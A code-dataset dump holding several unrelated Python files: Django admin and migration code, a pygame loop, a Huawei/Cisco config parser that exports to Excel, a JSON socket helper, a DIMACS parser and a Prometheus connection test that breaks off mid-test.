index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
995,000 | d779fe3d8c124940c4cc6b0cfd0738fcbe1763d3 | # Django
from django.contrib import admin
from django.utils.html import format_html
# Model
from .models import Group, Membership
# Utils
import base64
@admin.register(Group)
class GroupAdmin(admin.ModelAdmin):
'''Group admin.'''
list_display = ('id', 'name', 'slug', 'description',
'created', 'modified', 'pic_render')
@admin.register(Membership)
class MembershipAdmin(admin.ModelAdmin):
'''Membership admin.'''
list_display = ('id', 'user', 'group', 'joined', 'is_admin')
list_filter = ('group', 'user')
|
995,001 | 10fe6790974751a235416caa213494891043ca48 | import sys, pygame
from hero import Hero
from settings import Settings
import gamefunctions as gf
from pygame.sprite import Group
from start_button import Play_button
def run_game():
pygame.init()
game_settings = Settings()
message = input("Start Game:")
screen = pygame.display.set_mode(game_settings.screen_size)
pygame.display.set_caption("Monster Attack")
#hero = Hero(screen)
#bullets = Group()
play_button = Play_button(screen, message)
while 1:
gf.check_events(hero, bullets, game_settings, screen, play_button)
gf.update_screen(game_settings, screen, hero, bullets, play_button)
if game_settings.game_active:
hero.update()
bullets.update()
for bullet in bullets:
if bullet.rect.bottom <= 0:
bullets.remove(bullet)
if len(bullets) > 15:
bullets.remove(bullet)
run_game()
|
995,002 | a3a0df505ca4eb6e3a2958e547ab1aa0a3a90a2f | import re
import ipaddress
import pandas as pd
def is_valid_ipv4_address (address):
try:
ipaddress.IPv4Address(address)
return True
except ipaddress.AddressValueError:
return False
fileDataHuawei=[]
with open("D:/install/Programming/Python/disp_cur_vvo.txt") as file:
# fileData = file.readlines()
for data in file:
fileDataHuawei.append(data.strip())
# print (fileDataHuawei)
# print (len(fileDataHuawei))
fileDataCisco=[]
with open("D:/install/Programming/Python/show_run_khb.txt") as file:
# fileData = file.readlines()
for data in file:
fileDataCisco.append(data.strip())
# print (fileDataCisco)
# print (len(fileDataCisco))
fileDataHuaweiSwitch=[]
with open("D:/install/Programming/Python/disp_cur_switch.txt") as file:
# fileData = file.readlines()
for data in file:
fileDataHuaweiSwitch.append(data.strip())
# print (fileDataHuaweiSwitch)
# print (len(fileDataHuaweiSwitch))
def int_list_cisco_router(fileData):
exclamList = [i for i, item in enumerate(fileData) if item.find("!") == 0]
print(exclamList)
intListMain = []
# intDict = {"intNum": [], "intSub":[] , "intDesc":[]}
intDict = {key: [] for key in ["intNum",
"intSub",
"intStatus",
"intDesc",
"intType",
"intL3IpAddress",
# "intL3IpMask",
"intVRF",
"intSpeed",
"intL2vcIpPeer",
"intL2vcId",
"intNetwork",
"intRouteStaticNetwork",
"intRouteHexthop"]}
routeDict={key: [] for key in["routeVRF",
"routeStaticNetwork",
"routeStaticNextHop"]}
bgpDict = {key: [] for key in ["bgprIpv4Family",
"bgpVRF",
"bgpPeerIp",
"bgpPeerAs",
"bgpRouteLimit,"
"bgpOtherParam"]}
# for key in intDict:
# print("Begin:", intDict[key], len(intDict[key]))
for i in range(len(exclamList)-1):
# print (sharpList[i])
for k in fileData[exclamList[i] + 1:exclamList[i+1]]:
# print (k)
# if ("interface" in k and "loop-detect" not in k):
# find any interface and generate list of attributes
if (k.find("interface ")==0):
# print ("range is:", fileData.index(k), sharpList[i+1])
for key in intDict:
intDict[key].append(False)
temp1 = re.split(' ', k)
if ("." in temp1[1]):
temp1.append(temp1[1].split(".")[1])
# print ("temp1: ", temp1, len(temp1))
else:
temp1.append("")
intListMain.append(temp1[1])
# intDict["intNum"].append(temp1[1].split(".")[0])
intDict["intNum"][len(intDict["intNum"])-1]=temp1[1].split(".")[0]
# intDict["intSub"].append(temp1[2])
if len(temp1)>3:
intDict["intSub"][len(intDict["intSub"]) - 1] = temp1[3]
else:
intDict["intSub"][len(intDict["intSub"]) - 1] = temp1[2]
for k in fileData[fileData.index(k):exclamList[i + 1]]:
if "description" in k:
temp2 = k.split(' ', 1)
intDict["intDesc"][len(intDict["intDesc"])-1]=temp2[1]
# print(intDict["intSub"][len(intDict["intSub"])-1], intDict["intDesc"][len(intDict["intDesc"])-1])
if "ipv4 address" in k:
if "secondary" not in k:
temp3 = k.split()
intDict["intType"][len(intDict["intType"]) - 1] = "L3"
# intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = temp3[2]
intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen
# intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1] = temp3[3]
intDict["intNetwork"][len(intDict["intNetwork"]) - 1] = ipaddress.IPv4Interface((temp3[2], temp3[3])).network
else:
temp3 = k.split()
intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = [intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1]]
intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1].append(ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen)
# intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1] = [intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1]]
# intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1].append(temp3[3])
if "shutdown" in k and "undo shutdown" not in k:
intDict["intStatus"][len(intDict["intStatus"]) - 1] = "shutdown"
if "vrf" in k:
temp4 = k.split()
intDict["intVRF"][len(intDict["intVRF"]) - 1] = temp4[1]
if "service-policy" in k:
temp5 = k.split()
intDict["intSpeed"][len(intDict["intSpeed"]) - 1] = temp5[2]
if "mpls l2vc" in k:
temp6 = k.split()
intDict["intType"][len(intDict["intType"]) - 1] = "xconnect"
intDict["intL2vcIpPeer"][len(intDict["intL2vcIpPeer"]) - 1] = temp6[2]
intDict["intL2vcId"][len(intDict["intL2vcId"]) - 1] = temp6[3]
# if "sub" in k:
# intDict["intSub"].append(temp1[2])
# print ("lenght:", len(intDict["intNum"]), len(intDict["intSub"]), len(intDict["intDesc"]))
if k.find("ip route-static")==0 and "NULL" not in k:
for key in routeDict:
routeDict[key].append(False)
temp11=k.split()
if "vpn-instance" in k:
routeDict["routeVRF"][len(routeDict["routeVRF"])-1] = temp11[3]
routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"])-1] = ipaddress.IPv4Interface(
(temp11[4], temp11[5])).with_prefixlen
if is_valid_ipv4_address(temp11[6]):
routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"])-1] = ipaddress.IPv4Address(
temp11[6]).compressed
else:
routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
temp11[7]).compressed
else:
routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"]) - 1] = ipaddress.IPv4Interface(
(temp11[2], temp11[3])).with_prefixlen
# print (temp11[4])
routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
temp11[4]).compressed
if k.find("bgp")==0:
for key in bgpDict:
bgpDict[key].append(False)
for i in range(len(routeDict["routeStaticNextHop"])):
for j in range(len(intDict["intNetwork"])):
if intDict["intType"][j] == "L3" and ipaddress.IPv4Address(routeDict["routeStaticNextHop"][i]) in ipaddress.IPv4Network(intDict["intNetwork"][j]) \
and routeDict["routeVRF"][i]==intDict["intVRF"][j]:
# print (routeDict["routeStaticNextHop"][i], intDict["intNetwork"][j])
intDict["intRouteStaticNetwork"][j]=routeDict["routeStaticNetwork"][i]
intDict["intRouteHexthop"][j]=routeDict["routeStaticNextHop"][i]
# print (intDict["intNum"][100], intDict["intSub"][100], intDict["intDesc"][100])
# for key in intDict:
# print(key, intDict[key][371])
# print ("IP:", intDict["intL3IpAddress"][371])
#
# for key in routeDict:
# print (key, routeDict[key])
#
# df = pd.DataFrame(intDict)
# print (df)
# export data to excel:
# df.to_excel(r'test.xlsx', index = False, header = True)
# print (intListMain)
return intDict
def int_list_huawei_router(fileData):
sharpList = [i for i, item in enumerate(fileData) if item.find("#")==0]
# print (sharpList)
intListMain = []
# intDict = {"intNum": [], "intSub":[] , "intDesc":[]}
intDict = {key: [] for key in ["intNum",
"intSub",
"intStatus",
"intDesc",
"intType",
"intL3IpAddress",
# "intL3IpMask",
"intVRF",
"intSpeed",
"intL2vcIpPeer",
"intL2vcId",
"intNetwork",
"intRouteStaticNetwork",
"intRouteHexthop"]}
routeDict={key: [] for key in["routeVRF",
"routeStaticNetwork",
"routeStaticNextHop"]}
bgpDict = {key: [] for key in ["bgprIpv4Family",
"bgpVRF",
"bgpPeerIp",
"bgpPeerAs",
"bgpRouteLimit,"
"bgpOtherParam"]}
# for key in intDict:
# print("Begin:", intDict[key], len(intDict[key]))
for i in range(len(sharpList)-1):
# print (sharpList[i])
for k in fileData[sharpList[i] + 1:sharpList[i+1]]:
# print (k)
# if ("interface" in k and "loop-detect" not in k):
# find any interface and generate list of attributes
if (k.find("interface ")==0):
# print ("range is:", fileData.index(k), sharpList[i+1])
for key in intDict:
intDict[key].append(False)
temp1 = re.split(' ', k)
if ("." in temp1[1]):
temp1.append(temp1[1].split(".")[1])
else:
temp1.append("")
intListMain.append(temp1[1])
# intDict["intNum"].append(temp1[1].split(".")[0])
intDict["intNum"][len(intDict["intNum"])-1]=temp1[1].split(".")[0]
# intDict["intSub"].append(temp1[2])
intDict["intSub"][len(intDict["intSub"]) - 1] = temp1[2]
for k in fileData[fileData.index(k):sharpList[i + 1]]:
if "description" in k:
temp2 = k.split(' ', 1)
intDict["intDesc"][len(intDict["intDesc"])-1]=temp2[1]
# print(intDict["intSub"][len(intDict["intSub"])-1], intDict["intDesc"][len(intDict["intDesc"])-1])
if "ip address" in k and not "unnumbered" in k:
if "sub" not in k:
temp3 = k.split()
intDict["intType"][len(intDict["intType"]) - 1] = "L3"
# intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = temp3[2]
intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = [ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen]
# intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = [
# intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1]]
# intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1] = temp3[3]
intDict["intNetwork"][len(intDict["intNetwork"]) - 1] = [ipaddress.IPv4Interface((temp3[2], temp3[3])).network.with_prefixlen]
# intDict["intNetwork"][len(intDict["intNetwork"]) - 1] = [
# intDict["intNetwork"][len(intDict["intNetwork"]) - 1]]
else:
temp3 = k.split()
# intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = [intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1]]
intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1].append(ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen)
intDict["intNetwork"][len(intDict["intNetwork"]) - 1].append(ipaddress.IPv4Interface((temp3[2], temp3[3])).network.with_prefixlen)
# intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1] = [intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1]]
# intDict["intL3IpMask"][len(intDict["intL3IpMask"]) - 1].append(temp3[3])
if "shutdown" in k and "undo shutdown" not in k:
intDict["intStatus"][len(intDict["intStatus"]) - 1] = "shutdown"
if "ip binding vpn-instance" in k:
temp4 = k.split()
intDict["intVRF"][len(intDict["intVRF"]) - 1] = temp4[3]
if "qos car cir" in k:
temp5 = k.split()
intDict["intSpeed"][len(intDict["intSpeed"]) - 1] = temp5[3]
if "mpls l2vc" in k:
temp6 = k.split()
intDict["intType"][len(intDict["intType"]) - 1] = "xconnect"
intDict["intL2vcIpPeer"][len(intDict["intL2vcIpPeer"]) - 1] = temp6[2]
intDict["intL2vcId"][len(intDict["intL2vcId"]) - 1] = temp6[3]
if "l2 binding vsi" in k:
temp7 = k.split()
intDict["intType"][len(intDict["intType"]) - 1] = "vsi"
# if "sub" in k:
# intDict["intSub"].append(temp1[2])
# print ("lenght:", len(intDict["intNum"]), len(intDict["intSub"]), len(intDict["intDesc"]))
if k.find("ip route-static")==0 and "NULL" not in k:
for key in routeDict:
routeDict[key].append(False)
temp11=k.split()
if "vpn-instance" in k:
routeDict["routeVRF"][len(routeDict["routeVRF"])-1] = temp11[3]
routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"])-1] = ipaddress.IPv4Interface(
(temp11[4], temp11[5])).with_prefixlen
if is_valid_ipv4_address(temp11[6]):
routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"])-1] = ipaddress.IPv4Address(
temp11[6]).compressed
else:
routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
temp11[7]).compressed
else:
routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"]) - 1] = ipaddress.IPv4Interface(
(temp11[2], temp11[3])).with_prefixlen
# print (temp11[4])
routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
temp11[4]).compressed
if k.find("bgp")==0:
for key in bgpDict:
bgpDict[key].append(False)
for i in range(len(routeDict["routeStaticNextHop"])):
for j in range(len(intDict["intNetwork"])):
# for k in range(len(routeDict["routeStaticNextHop"][i])):
if intDict["intNetwork"][j] != False:
# print (intDict["intNetwork"][j])
# print (len(intDict["intNetwork"][j]))
for l in range (len(intDict["intNetwork"][j])):
# print ((routeDict["routeStaticNextHop"][i], intDict["intNetwork"][j][l]))
if intDict["intType"][j] == "L3" and ipaddress.IPv4Address(routeDict["routeStaticNextHop"][i]) in ipaddress.IPv4Network(intDict["intNetwork"][j][l]) \
and routeDict["routeVRF"][i]==intDict["intVRF"][j]:
# print ("find: ", routeDict["routeStaticNextHop"][i], intDict["intNetwork"][j][l], routeDict["routeStaticNetwork"][i])
if intDict["intRouteStaticNetwork"][j]==False:
intDict["intRouteStaticNetwork"][j]=[routeDict["routeStaticNetwork"][i]]
# intDict["intRouteStaticNetwork"][j] = [intDict["intRouteStaticNetwork"][j]]
intDict["intRouteHexthop"][j]=[routeDict["routeStaticNextHop"][i]]
# intDict["intRouteHexthop"][j] = [intDict["intRouteHexthop"][j]]
else:
# print ("noFalse: ")
# print (intDict["intRouteStaticNetwork"][j])
intDict["intRouteStaticNetwork"][j].append(routeDict["routeStaticNetwork"][i])
intDict["intRouteHexthop"][j].append(routeDict["routeStaticNextHop"][i])
# print (intDict["intNum"][100], intDict["intSub"][100], intDict["intDesc"][100])
# for key in intDict:
# print(key, intDict[key][85])
# print ("IP:", intDict["intL3IpAddress"][85])
# print ("IP:", intDict["intL3IpAddress"][85][1])
# print ("net:", intDict["intNetwork"][85])
# print ("net:", intDict["intNetwork"][85][1])
# for key in routeDict:
# print (key, routeDict[key])
# df = pd.DataFrame(intDict)
# print (df)
# export data to excel:
# df.to_excel(r'test.xlsx', index = False, header = True)
# print (intListMain)
# ipv4 = ipaddress.ip_address(intDict["intL3IpAddress"][100])
# subnet1 = ipaddress.IPv4Network((0, intDict["intL3IpMask"][100]))
# print (ipaddress.ip_address(intDict["intL3IpAddress"][100]), ipv4.is_global)
#
# print (ipv4,"/",subnet1.prefixlen)
# # print (str(ipv4)+'/'+subnet1.prefixlen)
# # int1 = ipaddress.ip_interface(ipv4+"/"+subnet1)
#
# print (subnet1.prefixlen)
return intDict
def vlan_list_huawei_switch(fileData):
sharpList = [i for i, item in enumerate(fileData) if item.find("#")==0]
# print (sharpList)
intListMain = []
# intDict = {"intNum": [], "intSub":[] , "intDesc":[]}
vlanDict = {key: [] for key in ["vlanNum",
"vlanName",
"vlanInInt",
"vlanIntType"]}
intDict = {key: [] for key in ["intNum",
"intDesc",
"intPortType",
"intVlanInclude"]}
for i in range(len(sharpList)-1):
for k in fileData[sharpList[i] + 1:sharpList[i+1]]:
if k.find("interface ")==0:
# print ("range is:", fileData.index(k), sharpList[i+1])
for key in intDict:
intDict[key].append([])
temp1 = k.split()
intDict["intNum"][len(intDict["intNum"]) - 1] = temp1[1]
intDict["intVlanInclude"][len(intDict["intVlanInclude"]) - 1] = []
for k in fileData[fileData.index(k):sharpList[i + 1]]:
if "description" in k:
temp2 = k.split(' ', 1)
intDict["intDesc"][len(intDict["intDesc"])-1]=temp2[1]
if "port link-type" in k:
temp3 = k.split()
intDict["intPortType"][len(intDict["intPortType"])-1]=temp3[2]
if "port trunk allow-pass vlan" in k and "undo" not in k:
temp4 = k.split()
del temp4[:4]
for i in temp4:
if i == "to":
# print (temp4 [temp4.index(i)-1], temp4 [temp4.index(i)+1])
temp5 = list(range(int(temp4 [temp4.index(i)-1])+1, int(temp4 [temp4.index(i)+1])))
# print (temp5, "Len:", len(temp5))
if len(temp5)!=0:
for j in temp5:
temp4.append(j)
# print (list(range(1,1)))
del temp4 [temp4.index(i)]
temp4 = [int(item) for item in temp4]
temp4.sort()
for item in temp4:
intDict["intVlanInclude"][len(intDict["intVlanInclude"]) - 1].append(item)
if "port default vlan" in k:
temp6 = k.split()
del temp6[:3]
intDict["intVlanInclude"][len(intDict["intVlanInclude"]) - 1].append(int(temp6[0]))
if k.find("vlan") ==0 and "vlan batch" not in k:
for key in vlanDict:
vlanDict[key].append([])
temp7 = k.split()
vlanDict["vlanNum"][len(vlanDict["vlanNum"]) - 1] = int(temp7[1])
# print ("test", fileData[fileData.index(k)])
if fileData[fileData.index(k)+1].find("description")==0 or fileData[fileData.index(k)+1].find("name")==0:
temp8 = fileData[fileData.index(k)+1].split(' ', 1)
vlanDict["vlanName"][len(vlanDict["vlanName"]) - 1] = temp8[1]
for data1 in vlanDict["vlanNum"]:
# vlanDict["vlanInInt"][vlanDict["vlanNum"].index(data1)]=[]
for num1 in range(len(intDict["intVlanInclude"])):
for num2 in range(len(intDict["intVlanInclude"][num1])):
if data1 ==intDict["intVlanInclude"][num1][num2]:
# print(data1, "in", intDict["intVlanInclude"][num1][num2], intDict["intNum"][num1])
vlanDict["vlanInInt"][vlanDict["vlanNum"].index(data1)].append(intDict["intNum"][num1])
vlanDict["vlanIntType"][vlanDict["vlanNum"].index(data1)].append(intDict["intPortType"][num1])
# for data2 in range (len(intDict["intVlanInclude"][num1])):
# print ("proTest", intDict["intVlanInclude"][num1])
# print("vlanNum", data1, vlanDict["intNum"][vlanDict["vlanNum"].index(data1)])
# print (intDict["intVlanInclude"][190])
# df = pd.DataFrame(intDict)
# df1 = pd.DataFrame(vlanDict)
# print (df.loc[190])
# print (df1)
# print (vlanDict)
return vlanDict
# print (int_list_huawei_router(fileDataHuawei))
# int_list_huawei_router(fileDataHuawei)
# vlan_list_huawei_switch(fileDataHuaweiSwitch)
dictOfRouter = int_list_huawei_router(fileDataHuawei)
dictOfRouterCisco = int_list_cisco_router(fileDataCisco)
dictOfSwitch = vlan_list_huawei_switch(fileDataHuaweiSwitch)
dictOfAll={}
# print (dictOfRouter.keys())
# dictOfAll = dict.fromkeys(list(dictOfRouter.keys())+list(dictOfSwitch.keys()))
dictOfAll = {key: [] for key in (list(dictOfRouter.keys())+list(dictOfSwitch.keys()))}
# dictOfAll.update(dictOfSwitch.keys())
# print (dictOfAll)
# dataOutRouter = pd.DataFrame(int_list_huawei_router(fileDataHuawei))
# dataOutSwitch = pd.DataFrame(vlan_list_huawei_switch(fileDataHuaweiSwitch))
#
# print(dataOutRouter)
# print(dataOutSwitch)
for num1 in range(len(dictOfRouter["intNum"])):
for num2 in range(len(dictOfSwitch["vlanNum"])):
if dictOfRouter["intNum"][num1] == "GigabitEthernet3/0/1" and dictOfRouter["intSub"][num1]==str(dictOfSwitch["vlanNum"][num2]):
# print (dictOfRouter["intNum"][num1], dictOfRouter["intSub"][num1], dictOfSwitch["vlanNum"][num2])
dictOfAll["intNum"].append(dictOfRouter["intNum"][num1])
dictOfAll["intSub"].append(dictOfRouter["intSub"][num1])
dictOfAll["intStatus"].append(dictOfRouter["intStatus"][num1])
dictOfAll["intDesc"].append(dictOfRouter["intDesc"][num1])
dictOfAll["intType"].append(dictOfRouter["intType"][num1])
dictOfAll["intL3IpAddress"].append(dictOfRouter["intL3IpAddress"][num1])
dictOfAll["intVRF"].append(dictOfRouter["intVRF"][num1])
dictOfAll["intSpeed"].append(dictOfRouter["intSpeed"][num1])
dictOfAll["intL2vcIpPeer"].append(dictOfRouter["intL2vcIpPeer"][num1])
dictOfAll["intL2vcId"].append(dictOfRouter["intL2vcId"][num1])
dictOfAll["intNetwork"].append(dictOfRouter["intNetwork"][num1])
dictOfAll["intRouteStaticNetwork"].append(dictOfRouter["intRouteStaticNetwork"][num1])
dictOfAll["intRouteHexthop"].append(dictOfRouter["intRouteHexthop"][num1])
dictOfAll["vlanNum"].append(dictOfSwitch["vlanNum"][num2])
dictOfAll["vlanName"].append(dictOfSwitch["vlanName"][num2])
dictOfAll["vlanInInt"].append(dictOfSwitch["vlanInInt"][num2])
dictOfAll["vlanIntType"].append(dictOfSwitch["vlanIntType"][num2])
# for key in dictOfRouter:
# dictOfAll.append(key[num1])
# for keyR in DictOfRouter["intSub"]:
# for keyS in DictOfSwitch["vlanNum"]:
# # print("find", keyR, "in", keyS)
# if keyR==str(keyS):
# print ("Find!", keyR, "in", keyS)
# def int_list_router_and_switch(listRouter, listSwitch):
# print (dictOfAll)
# df2 = pd.DataFrame(dictOfAll)
# print (df2)
# df2.to_excel(r'test.xlsx', index = False, header = True)
df3 = pd.DataFrame(dictOfRouterCisco)
print (df3)
print (df3.loc[190])
df3.to_excel(r'test_cisco.xlsx', index=False, header=True)
|
995,003 | 56f0a4b12c1cfa0ecfb1486afb906a23ff819e3d | # Generated by Django 2.2.6 on 2019-11-10 12:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0004_auto_20191105_0652'),
]
operations = [
migrations.RemoveField(
model_name='item',
name='slug',
),
migrations.AlterField(
model_name='item',
name='image',
field=models.FileField(upload_to=''),
),
]
|
995,004 | a589c5940bcc9bc0d178dc83f4cf62f0f4fa9053 | print("Helllllllloooooo World!") #Print greeting
print("What is your name?") #Provide a prompt for the user to provide input
my_name = input() #Create a variable that allows for input
print("Nice to meet you, " + str.capitalize(my_name)) #You are concatenating the string and capitalizing the input from my_name
print('Your name has ' + str(len(my_name)) + ' letters in it.') #Concatenate the string and integer which is the length of your name.
#In order to do that you must convert the integer which is the length of your name which you call with len() to a string with str()
#You have nested the methods
if len(my_name) > 5:
print("Does your name ever feel heavy?")
else:
print("Your name is so light it could float away.")
#Use an if else statement to analyze the length of the name that was entered.
|
995,005 | a4aabcd655618f29c4bd27ba402027e3bbfc2c21 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import json
from Common.socket.Socket import *
class JsonSocket(Socket):
def __init__(self, conn=None, desc="", logger=get_stdout_logger()):
super().__init__(conn, desc, logger)
def __del__(self):
super().__del__()
@staticmethod
def is_json(data):
try:
json.loads(data)
return True
except ValueError:
return False
def send(self, json_dat):
try:
data = json.dumps(json_dat)
except Exception as e:
write_exception_log(self.logger, e, msg="send")
return False
# 데이터 utf-8 인코딩
data = data.encode('utf-8')
return super().send(data)
def recv(self):
data = super().recv()
if data is not None:
try:
data = data.decode('utf-8')
if len(data) == 0:
self.logger.error("recv data fail")
return None
return json.loads(data)
except Exception as e:
write_exception_log(self.logger, e, msg="recv")
return None
return None
def json_send_and_recv(ip, port, request_dict, recv_=True,
show_send_recv_dat_=False, desc="", logger=get_stdout_logger()):
sock = JsonSocket(desc=desc, logger=logger)
ret = sock.send_and_recv(ip, port, request_dict, recv_, show_send_recv_dat_)
sock.uninitialize()
del sock
return ret
|
995,006 | 960599979ac084fc155eb73e808de12a6bc5018f | """
Parse the input formula in dimacs format
"""
class Parser:
def parse_dimacs(input_file):
formula = []
with open(input_file) as file:
for line in file:
if line.startswith('c'):
continue
if line.startswith('p'):
num_literals = int(line.split()[2])
continue
# convert to integer clause
clause = [int(x) for x in line[:-2].split()]
formula.append(clause)
file.close()
return formula, num_literals
|
995,007 | 957a43402464ecdd5976ac9dcab0722af93784de | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2023 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the prometheus connection module."""
import asyncio
from typing import cast
from unittest.mock import MagicMock, Mock
import pytest
from aea.common import Address
from aea.configurations.base import ConnectionConfig, PublicId
from aea.exceptions import AEAEnforceError
from aea.identity.base import Identity
from aea.mail.base import Envelope, Message
from aea.protocols.dialogue.base import Dialogue as BaseDialogue
from packages.fetchai.connections.prometheus.connection import (
ConnectionStates,
PrometheusConnection,
)
from packages.fetchai.protocols.prometheus.dialogues import PrometheusDialogue
from packages.fetchai.protocols.prometheus.dialogues import (
PrometheusDialogues as BasePrometheusDialogues,
)
from packages.fetchai.protocols.prometheus.message import PrometheusMessage
class PrometheusDialogues(BasePrometheusDialogues):
"""The dialogues class keeps track of all prometheus dialogues."""
def __init__(self, self_address: Address, **kwargs) -> None:
"""
Initialize dialogues.
:return: None
"""
def role_from_first_message( # pylint: disable=unused-argument
message: Message, receiver_address: Address
) -> BaseDialogue.Role:
"""Infer the role of the agent from an incoming/outgoing first message
:param message: an incoming/outgoing first message
:param receiver_address: the address of the receiving agent
:return: The role of the agent
"""
return PrometheusDialogue.Role.AGENT
BasePrometheusDialogues.__init__(
self,
self_address=self_address,
role_from_first_message=role_from_first_message,
)
class TestPrometheusConnection:
"""Test the packages/connection/prometheus/connection.py."""
def setup(self):
"""Initialise the class."""
self.metrics = {}
configuration = ConnectionConfig(
connection_id=PrometheusConnection.connection_id,
port=9090,
)
self.some_skill = "some/skill:0.1.0"
self.agent_address = "my_address"
self.agent_public_key = "my_public_key"
self.protocol_specification_id = PublicId.from_str("fetchai/prometheus:1.1.7")
identity = Identity(
"name", address=self.agent_address, public_key=self.agent_public_key
)
self.prometheus_con = PrometheusConnection(
identity=identity, configuration=configuration, data_dir=MagicMock()
)
self.loop = asyncio.get_event_loop()
self.prometheus_address = str(PrometheusConnection.connection_id)
self.dialogues = PrometheusDialogues(self.some_skill)
async def send_add_metric(self, title: str, metric_type: str) -> None:
"""Send an add_metric message."""
msg, sending_dialogue = self.dialogues.create(
counterparty=self.prometheus_address,
performative=PrometheusMessage.Performative.ADD_METRIC,
title=title,
type=metric_type,
description="a gauge",
labels={},
)
assert sending_dialogue is not None
envelope = Envelope(
to=msg.to,
sender=msg.sender,
message=msg,
)
await self.prometheus_con.send(envelope)
async def send_update_metric(self, title: str, update_func: str) -> None:
"""Send an update_metric message."""
msg, sending_dialogue = self.dialogues.create(
counterparty=self.prometheus_address,
performative=PrometheusMessage.Performative.UPDATE_METRIC,
title=title,
callable=update_func,
value=1.0,
labels={},
)
assert sending_dialogue is not None
assert sending_dialogue.last_message is not None
envelope = Envelope(
to=msg.to,
sender=msg.sender,
message=msg,
)
await self.prometheus_con.send(envelope)
def teardown(self):
"""Clean up after tests."""
self.loop.run_until_complete(self.prometheus_con.disconnect())
@pytest.mark.asyncio
async def test_connection(self):
"""Test connect."""
assert (
self.prometheus_con.state == ConnectionStates.disconnected
), "should not be connected yet"
await self.prometheus_con.connect()
assert (
self.prometheus_con.state == ConnectionStates.connected
), "should be connected"
# test add metric (correct)
await self.send_add_metric("some_metric", "Gauge")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 200
assert msg.message == "New Gauge successfully added: some_metric."
# test add metric (already exists)
await self.send_add_metric("some_metric", "Gauge")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 409
assert msg.message == "Metric already exists."
# test add metric (wrong type)
await self.send_add_metric("cool_metric", "CoolBar")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 404
assert msg.message == "CoolBar is not a recognized prometheus metric."
# test update metric (inc: correct)
await self.send_update_metric("some_metric", "inc")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 200
assert msg.message == "Metric some_metric successfully updated."
# test update metric (set: correct)
await self.send_update_metric("some_metric", "set")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 200
assert msg.message == "Metric some_metric successfully updated."
# test update metric (doesn't exist)
await self.send_update_metric("cool_metric", "inc")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 404
assert msg.message == "Metric cool_metric not found."
# test update metric (bad update function: not found in attr)
await self.send_update_metric("some_metric", "go")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 400
assert msg.message == "Update function go not found for metric some_metric."
# test update metric (bad update function: found in getattr, not a method)
await self.send_update_metric("some_metric", "name")
envelope = await self.prometheus_con.receive()
msg = cast(PrometheusMessage, envelope.message)
assert msg.performative == PrometheusMessage.Performative.RESPONSE
assert msg.code == 400
assert (
msg.message
== "Failed to update metric some_metric: name is not a valid update function."
)
# Test that invalid message is rejected.
